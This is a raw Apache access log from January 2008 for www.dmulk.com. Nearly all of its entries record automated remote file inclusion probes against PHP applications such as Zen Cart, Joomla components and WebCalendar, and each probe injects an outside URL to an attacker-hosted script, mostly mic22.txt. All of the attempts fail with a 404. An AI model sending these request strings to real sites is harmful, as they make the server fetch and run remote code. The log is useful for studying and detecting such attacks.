70.86.201.130 - - [16/Jan/2008:08:50:30 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fastmodding.com//shop/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:50:30 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:50:30 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:50:30 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fastmodding.com//shop/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:50:30 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:50:30 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:50:30 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:50:30 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [16/Jan/2008:08:50:36 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [16/Jan/2008:08:50:36 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [16/Jan/2008:08:50:36 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [16/Jan/2008:08:50:43 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [16/Jan/2008:08:50:44 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [16/Jan/2008:08:50:44 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.250.115 - - [16/Jan/2008:08:50:52 -0800] "GET /logs/access_071224.log/convert/mvcw.php?vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:51:17 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:51:18 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:51:18 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.89.146 - - [16/Jan/2008:08:51:24 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.89.146 - - [16/Jan/2008:08:51:24 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.89.146 - - [16/Jan/2008:08:51:24 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:51:31 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:51:37 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:51:42 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:51:42 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:51:44 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:51:49 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:52:06 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:52:11 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:52:12 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.157.58.25 - - [16/Jan/2008:08:52:38 -0800] "GET /logs/access_080101.log/tools/send_reminders.php?noSet=0&includedir=http://www.sajin88.com/bbs/data1/90.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:52:42 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:52:42 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:52:42 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [16/Jan/2008:08:53:16 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [16/Jan/2008:08:53:19 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.89.146 - - [16/Jan/2008:08:53:24 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.187.213.53 - - [16/Jan/2008:08:53:24 -0800] "GET //webcalendar/tools/send_reminders.php?noSet=0&includedir=http://dominic888.no-ip.info:8081/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
38.102.88.143 - - [16/Jan/2008:08:53:57 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:02 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [16/Jan/2008:08:54:04 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [16/Jan/2008:08:54:04 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [16/Jan/2008:08:54:05 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:05 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:07 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:07 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:07 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [16/Jan/2008:08:54:07 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
38.102.88.143 - - [16/Jan/2008:08:54:15 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
8.6.95.148 - - [16/Jan/2008:08:54:25 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:27 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:29 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:31 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:32 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fastmodding.com//shop/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:33 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:34 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://charitygrants.org/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:35 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.fastmodding.com//shop/images/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:35 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:39 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:39 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.89.146 - - [16/Jan/2008:08:54:39 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:39 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:41 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:41 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:41 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:54:44 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.238.199.66 - - [16/Jan/2008:08:54:48 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.103.221.21 - - [16/Jan/2008:08:55:23 -0800] "GET /index.php?option=com_masscontent&Itemid=1&mostConfig_absolute_path=http://nybap.org/editor/flower.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:55:34 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:55:34 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:55:35 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:55:36 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:55:36 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:55:41 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:56:06 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:56:07 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:56:07 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:56:24 -0800] "GET /logs/access_071203.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:56:29 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.89.146 - - [16/Jan/2008:08:56:32 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:56:35 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
12.180.246.7 - - [16/Jan/2008:08:56:45 -0800] "GET /index.php?page=http://66.206.168.162:32000/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
12.180.246.7 - - [16/Jan/2008:08:56:45 -0800] "GET /logs/index.php?page=http://66.206.168.162:32000/test.txt??? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:56:50 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:58:17 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:58:20 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:58:24 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:58:30 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:58:37 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.189.4.131 - - [16/Jan/2008:08:58:39 -0800] "GET /logs/1000http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.189.4.131 - - [16/Jan/2008:08:58:39 -0800] "GET /1000http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.201.130 - - [16/Jan/2008:08:58:44 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.nettogolf.se/nettogolf/filer/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:59:03 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:59:20 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:59:21 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.48.124 - - [16/Jan/2008:08:59:25 -0800] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.geocities.com/mayam_anay/vaksin? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:59:43 -0800] "GET /logs/access_071222.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:59:51 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:59:54 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.40.231.114 - - [16/Jan/2008:08:59:55 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sajin88.com/bbs/paddy/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.7.80 - - [16/Jan/2008:09:00:23 -0800] "GET /minamijewelry/html/index.html HTTP/1.0" 200 13288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.147.237.116 - - [16/Jan/2008:09:02:58 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
